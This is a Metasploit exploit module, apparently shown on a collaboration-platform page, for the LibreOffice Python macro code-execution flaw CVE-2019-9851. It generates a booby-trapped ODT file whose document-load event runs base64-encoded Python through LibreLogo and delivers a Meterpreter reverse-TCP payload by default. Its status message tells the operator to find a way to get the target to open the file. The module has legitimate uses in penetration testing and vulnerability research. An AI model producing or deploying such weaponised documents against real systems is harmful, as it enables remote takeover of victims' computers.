Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::FILEFORMAT
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'            => 'LibreOffice Macro Python Code Execution',
14
      'Description'     => %q{
15
        LibreOffice comes bundled with sample macros written in Python and
16
        allows the ability to bind program events to them.
17

18
        LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.
19

20
        This module generates an ODT file with a dom loaded event that,
21
        when triggered, will execute arbitrary python code and the metasploit payload.
22
      },
23
      'License'         => MSF_LICENSE,
24
      'Author'          =>
25
        [
26
          'Nils Emmerich',    # Vulnerability discovery and PoC
27
          'Shelby Pace',      # Base module author (CVE-2018-16858), module reviewer and platform-independent code
28
          'LoadLow',          # This msf module
29
          'Gabriel Masei'     # Global events vuln. disclosure
30
        ],
31
      'References'      =>
32
        [
33
          [ 'CVE', '2019-9851' ],
34
          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ],
35
          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ],
36
          [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]
37
        ],
38
      'DisclosureDate'  => '2019-07-16',
39
      'Platform'        => 'python',
40
      'Arch'            => ARCH_PYTHON,
41
      'DefaultOptions'  => { 'Payload' => 'python/meterpreter/reverse_tcp' },
42
      'Targets'         => [ ['Automatic', {}] ],
43
      'DefaultTarget'   =>  0
44
    ))
45

46
    register_options(
47
    [
48
      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),
49
      OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),
50
    ])
51
  end
52

53
  def gen_file
54
    text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])
55
    py_code = Rex::Text.encode_base64(payload.encoded)
56
    @cmd = "exec(eval(str(__import__('base64').b64decode('#{py_code}'))))"
57
    @cmd = Rex::Text.html_encode(@cmd)
58

59
    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))
60
    libre_file = ERB.new(fodt_file).result(binding())
61

62
    print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.")
63

64
    libre_file
65
  rescue Errno::ENOENT
66
    fail_with(Failure::NotFound, 'Cannot find template file')
67
  end
68

69
  def exploit
70
    fodt_file = gen_file
71

72
    file_create(fodt_file)
73
  end
74
end
75

76